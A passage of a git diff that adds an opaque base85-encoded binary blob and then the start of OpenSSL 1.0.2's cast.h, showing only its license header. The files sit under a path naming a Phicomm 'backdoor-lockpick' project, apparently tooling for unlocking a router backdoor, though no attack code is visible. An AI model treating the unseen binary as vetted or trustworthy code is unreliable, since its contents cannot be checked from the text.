znWxAcao+t^-lzM1?)UxU_uJRC?X^C8t+m%)Ywf+y<@yFFswxo@5WtQa0qipDf4CzQ
z2Ez#b4=r~{%E72%RIqg#_Fa@7N*ASr($>+!1TEPDZ4A~Ifx$%8AQFM3B?d>#!v_cq
zHWZ-`X2lxXh{GWh7<>aJWQW#mHROP{iWUGg>L0`!q#FIH(KO}6glH^rI1pL<j!QW-
zga%^@kP>SMIiRFTZNT7E5g1$zq8MOpXoM*t7*UOrw2hN2Xxs}#4Peo@`-u0@NHGd&
zrvtKami$->;yIwOL4n{eE)?+s42sxxRp9V2Ab|~XRO19K8W)ck06Zp&5&VU09D*r`
z_Crt{0<ne&7GOB{5TSw)usTIEFj@&{uuvHoDE6>ugebro0E6>IhypEIG<FoAk^p@R
zP@vT~%Yvq82ACWgJBOy|2a8d(;eg07UxZxa1UX<r5j{W_1Q(9NHULRZOcV(KfX5T$
zkgg$u921p-U^z@d3L*kbp@9WXd7Mn7JW}Qn=t-alLZB!hf{?xl7GRF0aRuyF6~Q7$
zQ$7w&N@9R5O&nVis&SqL(gv(3O*z;sQYI0y0L^pa01p(9GO56hC<O5V0*>87VRwH!
zxd+*!DYpa;H!grJuRucjIJQ(&<06Y9O?e++CFOB!z$RNJlC2sEu}HQUFp`5Qa+-2H
zP<KU;qp-u+FJL`6G)}M@)i_7nxD4qx0N+ZGGP%G7FiDFRTLI496WarD2GFMktAGJi
z;Nhx?fR=-3KBP=C@Kg>dlMl(Gu(BX4U}2dU(4qa614}4u05MJ`5t8S`2_}i{%OeGY
zpjA-VIh;Mh5*T1<T%-m5EuxXc`Ou6KlK3Uy?Gdz!SY`6VC<7?s5JnQ`(v+`2l3)(5
zgd@%da1!WPG!o<-5U~(Jj>a~lL2Ahru`P<&*2Ca|YWxlb8r8TA(gaTh4!#1LUj}13
zTC5ukc~BA$^Mk_fVfR6BK!9nXU`yiIlEJ`-1*yQ}*y_MW;eZ!~wxtQefL#Rp;DaPV
zG!juX<)eTX1$6>JnunW5VRt}6L20a@54R7Z53<RkgoJ0Jk!-1;kdbV8AZrg%prj8o
zj$})Q)S(&&eh!1VRKUW4OJL9kMgYkIQVKF31R@cuDAo=(s*2DD)0`-=VGxW65G7hL
zmk;Q2FzJeb1F9I(g=*?|=pLwGzW_M~AQuC<3aUdJ!KZ{|$Uq~t5u%D>O@K~3467nm
z58Mh2sgRf?gm6NJL61ZOk;7;JCKoWtpy&Qc!CPno>~;>sbBPx0WeQ9t0Su%^j}3AJ
zcRm%`>R~)-K?Fhi4z~_M3+00xK!=e;i*18EWgMLiPAI70NE~K$js;|e<*;x#!5V!?
znU|1`95^RnkOa%YK?svU2j$8Zcyvg>928O%_7fxl6gv*1Itr}||9#RA*JgpH!9u_#
z;KBpQwEp3SLDBFX77I=$`L}<Opp?)!S5Oc@2ZWy?7L*>e?=7HNtb{wC2~Gv)VNvqo
z4$mClZ^d-rGbj*94HQovkV1enm=DzvfaE|;LB}fz4URelumA>RxK~l^6DXs5Xe2xl
zs2r}U5A<Gw=^y|eDuc76AqeS;4WY%xfhD*qv<g)5&<O)~7pQ!D1Pk=&+<~qJ;4Ziq
z*n*&a0!eZZvqb1_VavsiLu(&~;xKETfYle<!;S+{=pb8y8)JnQR5~~*RUjvTJG?)D
z7&v&ul>p*|l75)WObj*!5eQweVr{>#Kuh2O2sDT`uqTJz1GXS(5EsBp0_DS0Lh+Tu
z$y7sklP|&+T#8^;^!L%^1Ef6^AaFFH8x6Xo!Tpv9c5Msg4Z2_Lp&I%LopWDsFE-9Y
zYe4rMbfp3jP7HXDAh)1`02drsUi)_$0(*ZhK6?;sQJ|9zx$cXw1gn%QVuztsz|48b
z0Z*Jv9#p%(l@1ee2Z#lOcM=TX$_#)uq<>iP{lA^%{9RyyA-)Jx0w5rx3La<Z4RWP|
zo@ekV!R8%);_+e)xOigdp*?)SF}SirAuIz52PciXMvGMiuNd^ShkWC}YNLoTAq}AK
z$hmc3zyk>VfUv|MfB&LzC7A<eV3?q{(60^yBa|V^2xW{iX@=0>jY^d1+b{f=H?<>+
zISGN5;uSks57y(2GcYCu_3Jr7lH%?>Iy#YrY09M8CD-12acpt&XX%0_-7l^PmHhhh
zMWSRZc}%bwPRW1gM4cQ(dMM3B#G7u3-m+CM^|JltRAQqH#$&c(RG6D%Z*cO<Pp!q~
zmfB_$qGef6j5|{y1KqC4lg00L`59U`)D>8A$>mcH5R|^_oh5vEN>3{@Sj>CrOYU(a
zWd8n~f)n$A(%xO}hsPxclH)%V+9_9>4;wtv=~)l9dAw(>eyox)UD@E2)5N}N<=Y2M
zj?Qy>zdXGy(MI=@;s$Z1MAV%2TPB~Sp23b8trc0kJogdj55G@)M@6&$4e@v)|Je<A
zV$6oa6Rj`)shF@BQZoNeec=^X=@Pui_4nk;eO+h#*$lWApMUH7AtUKsc7nxSLte@>
zOni2X`RR=K;u)W<qK?YV>I+>qZz)P>v5h|Ur@ro->>?#^y>nL^X)JV8Wo&@7r`1xh
zwV|ezs^`-A=;%B0tb-mj<{G^9eU*sRibh6Do-8Hx>7gCdAc@OaT?w99j45Fej}>Q3
z+I*Vf)nuau&)iAbpKu5G2#1OdrSTw~H|lmOf0=}=HEuX0lx#lwwMx0KN`Fv%$wBkm
z!to~>JZp?=PA;c2`QDbLd8zd9?9jKJ4-YbXo9O7h@XN8+*FO9L0~t#D2gCQVx-&)d
zx~S(@(v#Y^WoD|EVjT!<zAOeaF^+$i&n+{p-gonP_=ARMk~6hw7$I#V^|ewqdqrC`
z{H}EOTDiRCxwQAs89Rv;PZme{P5qc=y%PF)e75?|NT)pIOTR8}gE_seo3exV)w((P
z2A+R-F52t0w|MXT=dOOFmUNiM>t8Dpp5de|Go^vk8<n=|{-y0LnW=$PzKhXP@fv68
zsS_#`*!;eW)Y4zz&U{DuMIdfm0vn8Y+q}5`qGF3t?~CX86(=*BwW&@_qjAvnhXph!
zV=F{t+4F!A;VC(vxzO|n^Izw&`oA9buNd@`eTmn_jJ}#4k|ZE-)~gw#cA*!uG|=#m
ziLVxs(F{KBWO=3Uv|GX>kBMmS#-ChV2HuY<!+X^(^74<vuT`h{ZUik`&=p$U@L6zl
zhMkNRm80`;7=f96fnOm~;wUU0H!!tqUQW%OS>%rFoBfb}VK%)g+fs+(To|oH^kUmP
zl35`dy=z#3V2W}3lXkUhQ^)gZ*c8LPGq)yAU`8%#xc^WUVDq5TE$Ole4WSaJ*_FJp
zo+>3z=96^c5=AJr+2y<|KEtLVa9kdTpri_27LWUUMK1&CRRj;Ua)>)TI4V`Y_XZ~w
z`y1=$!IUFAqA@>+8`K@EEwAw=QJtP;4=jA8NnrbZAtduvRO%*f;e^~on9ZgD5??Q5
z9jDvc?GzAo_ISsWf(&xgF^&;F&e@tXgiQRFYOv;AmSEfuO}frkf`+r_UaciuxH?7_
z{%WhnBz-;z)dlC${95}%{aaA8Z3%XEYJa%c%TQq-$4;QBqJ~nalRWiZCPp?TC$`S|
zG5JQ}_v-Gtd&f_7E|kNXOnIkjt=zmh5SDqLF~Qb_rOo$D>G^WUhmWnXIf&O`J!n77
zzbcK+CnRAPZ#Z^#^EOj3{`exD9cGfrO|2h)(MO%tM!`g4Vk;%&MUct|Yk6b^D(-%R
z_Ha*x{l!jxz8YnTY93{QzFXPs93Q=Rs}12~KP1rRNweil!+r7*#~)ETHe`LZNp+<^
zN&d@uTdKE2Q9}Qx{`iS*-R<T&(Q3yA1S=OAe?*gFfS7RyUCV=-d8HajhTWOgEBbTQ
zN;T?*IL&A!69s-xX%@tfwCYpA8#G%*4(fsnma&sexGUPR%^FW&%lESjJe@j{lPj`F
z9Ua47<;g6ajJOw4H&0AXty}j)NBY9_tkGIVY1o^wZ5g5iGo-mI6Q3%Pj4Rw>#J(lp
ztMKcT3}O4~wVUfZiD}PynfL{UzfX!to=UFLfP3nld*kz|^>SXehod3Rs<Tb>`T$O@
zSD@l@gQ;f}Y1M|d#52Ek(G5cSoc43~9jfYP2Ns2%;_68Eyu8S@xMw}O-EhyNR_OHG
zLnfR&Z%1V_Tii_FHrz$RMvRK<AFR<fS8WD1Eu?$9SCJR@eR{?$-|rQ5_axyhWNWhN
zKHZr~%|L}*@+8u?%K?{G1RR3hLl@O~x}z}GgB=%8>a%?BD9xI>^HeU4S4~#WM46OZ
z7QKv}8Em^qL6V#5M<B3vN0#|{GZXulpF<Oj;guztgBoc9!PPg-&AkY2rLZ;#=S5-|
z<z|_N1aFeaaVPi1CD#j0Rw;&)uz%J%@5rC@(Ft#_a!)0Vjcobbc(1&3<xBsu6DM^q
zliYVIWMs29w^nV^zI#@Hd_jtTF>bZ^GxN)}0sX!B%v4p~?(5bEA&EgGZ-tw+q}+w=
zJ`#{OruS1b&1PheuT6#ZUA9Y9dg%IvT0m9T-A%(2DP^Q_`do$)+qp~eUpJcx;&`u$
z5T>>H`zOf|CukVg?(ND_7jC<6#98w@ec-rMr^w!VzTkC##ZQ6lhV#U%Hm{x4FFlLZ
zA&BFC9gy4CZBy~m^tL1e%cbTTQNM<C$u&}@{U_HfnjiK*)t}k%(pLUh$(Cof|9Inu
z$HG%BJ)v&>WZgmw^*K*gVI}{aKr05Xp!E%%k(hPSOgZuB#NIxZ$?_V_U0JSGxl1o=
z8=6&{^i^J6h`x5Gza%u|!!pgtNK|;6SLWIr>qPujr@IfIMP5yK8oj&q)&7N`4d$7u
zZvgV!Ecs|cnSw1rjp6dr3oV^<rW9%Q%il7_pX#lKRNY&)sLU=uDOG1Yc5XX*U9tp=
zHB<S4td%&?Fw#o8>2GX4m9#+qOlI=5`um|yFB^pn%!x+~&jzn{99&^$$gpNfUl1A%
zO?SfNQd}{M$W1JQ@yFb-Ca~a3`f3VaZ<kr|6h3!iu!muZrn`^q-L^AlZjb*7)P8X`
zN!-Zf?YXZ0I#-!2AqfmRKvizw^++>ywL{JcDe_O>tJ8|RM^&`oHtGZ^mkd!=wU)Om
zs0F(|`Bg`_I4zjB9h)6ZUK5Y{qH1_QYGC!7R#2sNVg`Bp!nc#yB2~WA!Lj*Tb?4*i
zxh_giUR7Wsm0C!4Y@S>B)b()Zr2}{1v*&Wn6e<4WWV!L#?~Q#8vP(~Ki=^8nYexpz
zI`O~ya51z&OXmXiAabUjrzX<8tX`PA8{_nXCp<1M&uX+*Yj)3R)^p!x-a<U@SfjxC
z2lK2Mb5yQ@D!=^5+mq_2qS6WIGTglS0~&a5j%Xxt%wfCu5|-1D`}OBND;*SxO%m_%
za7(wp?Wogj6v~e>*Jv@`)T^W9{#Nf8)0be-rryxJhDb8%l}`_#>cXFK^jVGkoJ-oM
z=pu5OedFF~CUIWu!c2TI61mpu&sgLtATi~_V}}{eo5vC|t)E&kzbN@FJjZ=2Yh4R-
z!PSB`fiud^U6E{Hw_Nk**&C<Dw=aY{?x{9>c<z@k#Au)Uh^W)(fU2c{Z0MKBTP}(>
ztK(SDx^E^(jc9ZSy^>p04~an7U=;=xPyG2wG)4Qp*=0W$WO6eJ3?+Y!nc`M<`#SYU
zXBalvos+L_J1_64&AECv1A_tBzE-LJWN{}YH%$n`t7s1LZs&gbD>Cn`#kTI(g|m@H
zM0Z3yo-{Z0e$cHPa=pEL??sc0yIq6qb;4+MHL+pK$vcuGH?*zUSIH?Fv$#aBRoEKX
zr$>qeU+y9kT}i#`8pIp^c|Z<H_DMv+AJt?Gx96jXh#8LE+!D<rCt3GTsKxJ9IL%u(
zCBB$)YFKh9Ia_90Gm>~d;rPppy$eHEg$j0gXcm91KR+Gw=-VZD0FO!$Cawm?aN&wm
z&>U=yK~h2P=d&hl?-V_aJ2gLNQ6m@oZ#IRdZ)lU~1eDbIir;8wtX(c>c^vS%?Phh+
z*jD+)6y=LNBZOMF{4ZIlMDc1bcs##mFvzSKVbnL|ZcmSH&m|`2%9yT<j6GRtr@w6a
z$e`shYtqsJ{f#*O9~JuqyHO9wH@C`@)9O{F3nq=Oh@T>v(HZ`l{zLV4|Kc)w6Cpld
zTpRtSuG@SlQ(L4%MQr`Gr1o>ZyCnQln95TI*|m?^!bG~=J`%$_{Ht6Y1;?$apU`<B
zv+)79DmV4}PobZFK?g92G4KA^BY#h~ISXSY>4R0@bQ$KZINKRyA$bw8^}>6<&Msg!
zbEb>4ZIub5@;0z>^SvBXm?S2*n6Z-uH-jI`S0$jtnB>1YPW+1@k>}e=4=SomPJOTZ
z0pftII*RZ~9*US!=VYf<boK1UHD?~?tc0N@(niX}tjGCPQZ2U*ywohV*Vp6%i)?jM
z;mf#$GP;PHi(iXpD8hB`P7LK7@T&_=TU)>ydI?D$ym)(e(<APz1POdiJWP+U&WyVw
zUH)TWCjEGy!E4usBre;fX|91enLVx2<-+!kfLy+yq=ZYbpB#os{gMaA@apgdG6ZRf
zhDg4<U6lq&Lfb>voZMo3hR#Y;X3F##q4I1C`CBs_FspHEiWce`oiF1$q+|TaF6=RG
z*dk`On6`7a@jKYSc><~p9p&pCGUY_C(CzU2)%BYB3opWXT`x`x43`q9xTc=;7y52F
zQZm{_tI|ObSZ`aozs^fFyDT3U+LT3HE@5NARKBS>X|250c;VfHQ4&Y`n2;X_65bJe
z1KYD7JN)+A#(!Cej$t>;M^OAr3D#4*CoFX<T2{2TD)ggz2()7{0iD&2G&=Zc6;bl?
zxt`YsH-(47zdGJ3_+WjJyK7yb^=BA)s`BMdTN(m;a?ZI^nPYaiUJt#k^{r;Y-R2R0
zInBY+PBrp4=4$Gp;z7?+O8DNjPr4&RV^ePsDBWZ4;(K-UXdI`%PSm{)HA_QK>Ni~7
zj(-qwX3|W@CoPchb2FodEy>Vrd&^R_hv;XkW!90FKN^Y#{q43y=2bK#QblixmkYXt
z1%}D(#HbLyTy<BQlO|7QljkFi$Dk`!9bIVoDH>Z%I&d2)_xzm9H0Yz~JcPdru$DTP
zJ<Mkw%95#OW%8qaSeTM2pj6a%V=C>2V!tB&$l9lH?bcECpHu5j7zgGBdS8mRtWy@j
zE+*)W5MAcSw_3X*2<z@RcXySp_Zc~QnZ|Ku1wK(6{bpK6Al8&;D3-OjCa=!z%xK6a
z$m+bcj_*6EF2{3UWJvwoeua(P1Nze>o;A-59Y4~14&jb<W4^8C=~%L;AErTp4nKvF
z^?7;l%N_sPqn_~eeO<SW{IkVMCIoyG0^6ICmo9MR!XvK~U2m8jw00$z9;dxVl8`%e
zleKV=eamZV%RV&7jniuPLyvylb_B02@s;(REt)$4De372N?LsO^M=os-M<EizPR1T
zZ!3{Ub0O^P!6dWI;|c`l?Yzwdp01De?08#2w2oUHY1)rutBIedRI0wSkP)1(d?)&b
z@ql|SghDSu#hltr$KQM;7w>MYq^MOwKBnw2Fgw4(NnHALY`&ah#iuSOG1H}Q)JNlr
z-u*&L1>$RAz0`!ecyB&`i*lNo3~>_*&L4|j3QtM)ODY~)T5wpdk6&R&m;^BJbya3+
z$iWmkIJukQqR0C8H6*ecKEZ@eG5RndPSUA;x4HI?M)e{7?t#e(ArniIlLrU%@OR{_
z<Xi;IBrpQ4zyssUb2}T!F9^=e2AF)W>@$-eCyjiP`i5sA&UqXk`hg(g?k4fokC&u*
zoibse1O79M{@UrP4(QE~>-OUXD!iL*=`S1aBQM1H%W9f&dh~ylET<!))^vXJih4&_
zbE06(BWfv#{jr{sjmB4)HnJmHjMFaZ%_;IM;$}Pvi@4gP;iZ69>-Oxt_Xb7_PD>*(
zPO)hs+)8PFN-<Io9O|<)-YU=$h9oE~s&n;JhHw(XS;}SE<91kP^qKfBJ7Re6L=NE^
zr#xJJCrDrOPztRR;wZd=-YiU=mOjoWSvY3L^v;#hoHcyBLXM5=XX?o;9|;Cndn7wC
zksKXG-_(uTLEYZTLH9Wgxo0sVV{<+_Ia3R;rKV|k_M0*_e68;63p?Z&@nYtsGpF@P
zi`$EmVw&4^*@CQYpD<%EcIymtBy1q7^Uyihw6r0M73!!r;E`VHsW=%}fsl5HTCr&3
z{FP<h9LOh`LUQf{Wu$gTe%nyS(z)G}#5c{EP6<9Fu+jE*d$R2@ASPDK8#C(k{(=(j
zSR3Zn%qOp#)4GeQw+Qk63fIfrqeZd;e^O0$x!zkO9$6-?%VQqjU=e&8;960(eYSv8
zt$D@wHifWuCW=`+y?lC0{t_3jFPk9EW|P^^k?U4FVoiN^H1s@~0ZhZ~Yb?ask50l0
zcp0g<48<&#oGFd>52{r@k$bV+tEGy{xkD!gw|sJWi1zaP^8R;&5zQ~*UkOCF@sZB<
z8Q&J}I<6;ki1c=LGlz~f-mW8iF`R+!)TMcXYmSg2cqh_Q(j`_`M#|?o{O$R(<L9RR
zoXY+8^<neuJx%yRL<>#QMoT{3;{=~mu)f*p;4PO#+DD>hFs=llW;|C$A!F!6{(#4C
z0!B+yi_R{0@LN6qW+=EWnlmSx-xJed7&$ALI*_M51;5ut`SHXF69S?bGLNl`>0`#a
zxt`;?lVf#;t6breZn$ftEu|~XS(Sa|--kWwPEYeIGB%B`*oo|U&lJ6SduPL7abn#)
z@%=}*(v*~B*a(M6NcagG7udTUbWC0<|84$+CJ~i_I_p?FN1N9pU;3Yjkob?Y-QgMi
ze$AM52BEcOKl$qx@p~qs%UtMtJvTmAaPV7sDeQlI?<EzC+UgRBQ)|{M5AGXRhx1Q+
z-`1*<IpAau^VdNp7OyVRJD1}78(YF;`}|iZ<(gKa(u{U_>MuQ9B<rA^!v~luU!6+3
zfNtfu|M1<1m-RnO>K5MZeb+qEJ@=Aq{2FNlbu5OYa5W@K=IbEso!B%#TDmGfOR|Bf
z$ydgF8kab8i>fAq$98eNHtE7%&cO|@WOW3-C1c_ruME`48Xy1u3(vLBY7o5Kq7y5Z
zsdt<(<fJ-2V4`|fDfl`ygWiMsZ5L!jP}==D^<UXpuY)@(PBr9OHl^u_X;9dh$kwhk
zZsX;CMOAP#_T7H)WZFle{!($$)z;D1GYwG|Nl$}x*xDawI0_M5;ky#ia@VQ(J$;ix
z<qriidl@W6h{=~_8qK)?5&wXOq51$#LgM7Tn>~HXIl?EdF<q{|Qxr(wtS>B@X!5q%
z*O{=4hBA01fTnQ&(fyZa1&vga=O0u?jA*8BoC$rX_kvxe%*l)K^Y!2-ezhxpH=MJF
z<#G#&6*m=$T#a@~nlI0tbc@kwveS)4&99sm{y~(tMs>!te9E2B)oMTfRhU<7=cs$I
zdyofVR7}xM>NZAw+`%lGI`rwc5I>R7_G$R};PN+*FePPi1u~*5d_@|GPm0pOKZQQW
za<Z#&N90R{KKjh>_qkv9%y-|1IJrKK*OR^tvl(U9)5d1=%}+UZWF~v#O;OKMx~P@h
z4W$zoU_qWA2L$z$_dhM$Z>MnQ*5()b9akrdRCw6%m?LtOmAuYBJ&y66WEEbf`0-9d
z)1{?XC!?-WOIq&vytj=wL-Q$!K;`%Ve%k2Pj{g^iZ<+44M9-_D6O3Ya@lsdkUrJRU
z>&HKrj@#ZneNV+<w?^iKqMP{{?+wG?bX=`juRMG2265qs*k}I7E289So%5W7bKl;H
zJvQxkygkE!Ph-PeCTpQVT&#~|ZjT=;A3Xl6OzT#;hC!nrbpZ!C$4i!bv<~F^zp#Ax
zpLFl9+PyTqbz1G+*zuP8vVsRfJ$;Y#S9V6OcTd?EFeco`Tv37NmRHpTM;j{M?#D{R
zn_kT8fGufVzl&D68cr!!<1)l%bKZB$|1RMLokb12NKfWl)B3&!BH00ll`_rV`^sby
zERHZ8+3C!hftf0%K;lfKq~2p2KhB{`(KKU7pB-nU#`^-JmI(LaY?u!L%qPCj4W_pf
z@#beLfjkzUWhp;FXb~pxY1G+{_3`&HkxWN{m*gf6X5K|M;T_X`iyYle?JH(?d0zZz
zk_vubsmf*38!}yDe))67hg#YINkht?m(Z&;tqzW+Di^g)F^y;RPDRcONHUj2BI>?!
z(u_PR;t5r>ot6$s@>8TT)r=G2GcP?K!bx}PQ+kwxfEc@gCG4hXO2kaf^+<gp*1?tP
z?UZGC6rG{i^Ono!LM|w+j1#mVGuX8H=R+jKzsJ*Zav0<sTk-Fnv<p;_mGbU3JMiXg
z`5vDVp>vJ&m$TPOPNBH-DfJH)HwUXP5Ra{hzD<fJgPZt`er8!;`IzA&@;aU5!rYDc
zV#e<jpYZedVCc^`(D5s!??bBhx|%0~P$Ru1XDOr`e?0!_(>;?lN+nNVurfP^!e{W1
z?gV}fq<zcb{rw4ZUaNQib5Z?+0Nhxjy6l{XU2LqEPuecRpq>6}2<+_(9&ybf6SIYF
zZ7~LOi>o?RTy(ZZH=3>6UAiqUHJtzUA>4m>fJ?x}FvyI9EWmtQDpZvHg0$Y^)N@M_
z)0D1@AH|hwScQm!QsJ8fXUe=olf1?!)9<g_SI3Kn(i-PU@EkZfZE#5AGj8qO=XAZV
z7=0#l;?wzyZR&O!5x>Ug)GkNBs8^yaZ;0QQRE)G%2t2j_<dpN9(0f@(3!b^-!Rn!j
zfl<fHWcv@kQu2Msdh+$m^``8>TJ6VEUvxgUSl+Q-R67>xL6BRXk;gk4%3$+)qC#Pn
z%T&K-I#hI3+j+x@R4e1;Gacp6BlSk+uV+|wZR2mh3z6<~6dEPyUaIct&o;aiSWc1S
zQKb5;4EeF$M=C+!n=!E#wTYS2a*(CMET<>EaoH0KmND)OwuoL{o2t1Sl|Y}73T_@D
z9b<_;=j&_<eO{_qs#e0X`xt|R=d8EWil28g=CYB9!ZR(#??!Zrj8)Bdw8FLU-;XgX
za!rc!X_v|HTcq*NqQ3hIopQW)omg`{%$mKG;QV@mV5X=hd5#!8O`Iun=uej$iM$zT
zL(8Q+kM`@?NPHKHSs*?0Q?;)XQ6Lw2$|p@TjBKaX(Cwyzt!I|*yypXbjB|K?_0CMq
z(6(^~male6tA#SF?R*!TLXi6}s&opzl)e=j;kg~XWoq=@MR(hK)bNW)qZm_$g433$
z_R?<Y?oa^Zd#|t+{jux4#`_|pCqA5u_WpTGbm#Ia;b5{@63woBQ}N<t4ynq6R`}_W
zN<Pux!1ndA&v#2q`rBC}$xT}t>gGD0nW=5&*6gl`v?U1#bC=y|3C5~_8m>9dhMQqx
z7xkK#K9jwGFK(^;WM+qX1(W@NuaM^ZOn!4~L?Q9<*KLuC6YkHSutld!-1}V8pTkrU
z*POQKNS|}LwWd{G;@Zg?KHHU#Rz%keJZ=eHT|Ohu)W;Dl>}W`_w-!6v$-iK{8LQ6_
zprIe*V;7?RKG%j9V|pTN;l<Va1E!K8KPOI8MfywHtMtuK!c9Y8opKQ$R&Fi%yr8T4
zqBN-Xa&ZCm>F^p!%iWUKtEHL7(eg?xzr1e~QPyIMHLzJvEsar%&rXLB8CFRfU3N|w
zQt<6@@Mj+%CtZ1KZ!eW)diPFUy$gwZc*u{X(~1Lfd!oni>1iTeOSir6^T>+Ga<TWT
z!BXU=iA+^G(z?$S4b;D`eG~Cej_8})qn^ZxbPLBmvu4Iq*0W6y@B`dV(zbjzdIB2S
zy-wr5X_|QS%QY+L-V+%=`P?@`sJ1Wj<3vZs35@;uaEA&r5gKjoujlH{-e%IyzxY6x
zy9d>u*)BI~Eg}_~BZ60hjrCOty^xK6Jly#BN(I{edXB`#>y>K3${W4chL%^iojANH
zZuZ#v1PgC2J=AU}<`%#4pe8`X;cBMk8%<gj>pr2N>AHv9$ci*Z>3O=T2W3X*@mJ-V
z6!&Exixmp@Y`wJ#`lVC&u4M3~(2ER*ih)c`_>;ypIqnEa4M+G;{nT^kOal#(Q>wZr
zv{G8MCsnEr?39Wl3(8Br=+n0;wuD(2#nI3WMr!HB5lh{gkhnBcx}|;A#Lx5M>vVVX
z@n6{|ZgI+c4-Wj~k6~fmGCt${#wJKJKZf?9<RZ!I*881pp)@y#&Yoeo5`H_bH?!zo
z-`SWx-F#C8>=2ckp*(MDX<SF>T^6BIm_5UrZ!R)5b?IIb=Gq0Rik88+bF#tREFRe(
zGH(dOz7x-Q9$+;o3S^tMOwN(WN(QyJSlE5M+3DWlnl#W&#qw@2m`rlZaJP+)u{n}H
zbymD5W<>ekLz<0L)VCaz`313r4R#V@X}$a?qrfXYun=vTv*%#rU6%C^vh}J3BwF22
z{Y9E?=NfZ1kKK$ZsMo&D%WzC!s6(|NxGM#1wYImt-V#<2KdQrum>kHLt$p78?b(75
zp&DoE3!d8cQl0UI#MIisS7OH}?F$Fbj`1rb@F~_6+R@w{rs=qrzjfO)pI!DE_miA!
z`R~#FXID`-eG2z{`$-Z=S!1S_P&4P6%LZ(@iQZG1b~yM;ey}gOUGKSf=T^rjBC0W|
z@qrNw+6l{z3(CWM{Wl-IS1xU)dE>UndM#1>{hr3HZrtk{N{+8r4qEDImnd^6^`u^i
zpowL*N+QgJy`?6+I?w1uqZU)5KE7ak<lBGtX{Q?j1^#L4s+B?8u-xb;FAwUafd#a(
z>p8ZP)K0{gT5UG}pJ=+(5^6->eyQ6d9f=puiq7~BsF}21d*t>|cZTsz)+#ZP{trRo
zcMB3H2}bklqpn=87Ej0Xic_fhG=Fjwt+D3KO61wb=swjo#`jn(!@FNu_<mJ9cISuY
z!k{x>URX{oN6{V3>4EiQ;W=Jv(n5)-3HjOO9(W~{GOub-(9X~;HDyC%xbKY<r+X8f
zStUm|`Zl%hg%q4-7jaBYxf`N15mW1^sGAJul=^(PrJa*)MBowr(acx!0#r#A_MLCY
ztldck%zHwwmhDWxja2y*CLei~)sCAmn&>a}RzZd^Wd((coP0XwZjP>QoKnI_VNoG5
z3AaO5%>SIIu;_XI-|+A61&F}_eToQuSEsD50|OrwHb58==ul($J-`UOufqsDX$e^2
zWaJOQ#|NqaXZthvh#U|~)U?rr^3*I3h~%j`qlo3H`R<dTs73FQqNpW9$dswmiHO|E
zsU-n~qUHl4KvbTZR-PKt{r_puR}{psANc<gA^OiRHzD7Ty#J>b5wP@Mjp%Uq|9gfA
zM)to!fDpm{+i4;g#s7yq>Hoqh0do8={|{pbFlNx{Ab;S0RQ|ZkbA%r){Rc-L;YVBh
zGop_0KW2`$t^s%`-~Vn_0QfK59pH!l98LbQA9{oz704ev_6TPI1l0cE>3}@6b5t~c
zaF~UO%WW$!VGEc7N=w_s#mdzLu)i5C6IU~Hd#m&R;KcvIUHAtl0W(on)sRQ2nrJ8~
zX(?)(Xrts+6-{6!CN8dK7Pn0-Y;T)bo7vg_Lkam0?%Y2(v43!)U=K5(Lk;@)_892D
z@W0z01cC<PQ0k6wDyV=#gK+43*&{sYFP!=>Jn&C`q3}Q<Ka%GJG}ItFQ2&3Mu#1-i
z2op@$#nt)uXnRCCTiKflyIOg=!h|i&T+Lv@<}NNUVP~h`jD?efgOwwgb98dG5(Z~q
z=rBlscpFDI;XBSwcdVRUy?_p6$;#Hm+S$wjs+9lx#tBS7A^7*nkOLUhj?Tkx?zij_
z4UMdzLot#A{qH6x_?z?m14221);T&hM`g+T2mkj?@$pFTkN(l{CtXJ@3|a;f{Xf+g
z1G<pSf8-MI6G!WF0_LyA`4<h5QlLZnP)+{bCis4H0)K;mKJx!)l>ZC+Tl5(J-`xMu
zM|wxdbwEJ3<G=l<{iDx$B=~1M+SU<#3lNaaf9s3>(YHMk{4@SrAF9It%75jb{2%2R
z%0F}~AL$?A|Ft%>RN|lYcm8Y`I?K>q{cnB9=D%|fAlSn{fqw}xf3<(dj}FZJmwwM5
N|6Tvmg~)&F|3AkM%PIf>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast.h
new file mode 100644
index 0000000..0003ec9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast.h
@@ -0,0 +1,107 @@
+/* crypto/cast/cast.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
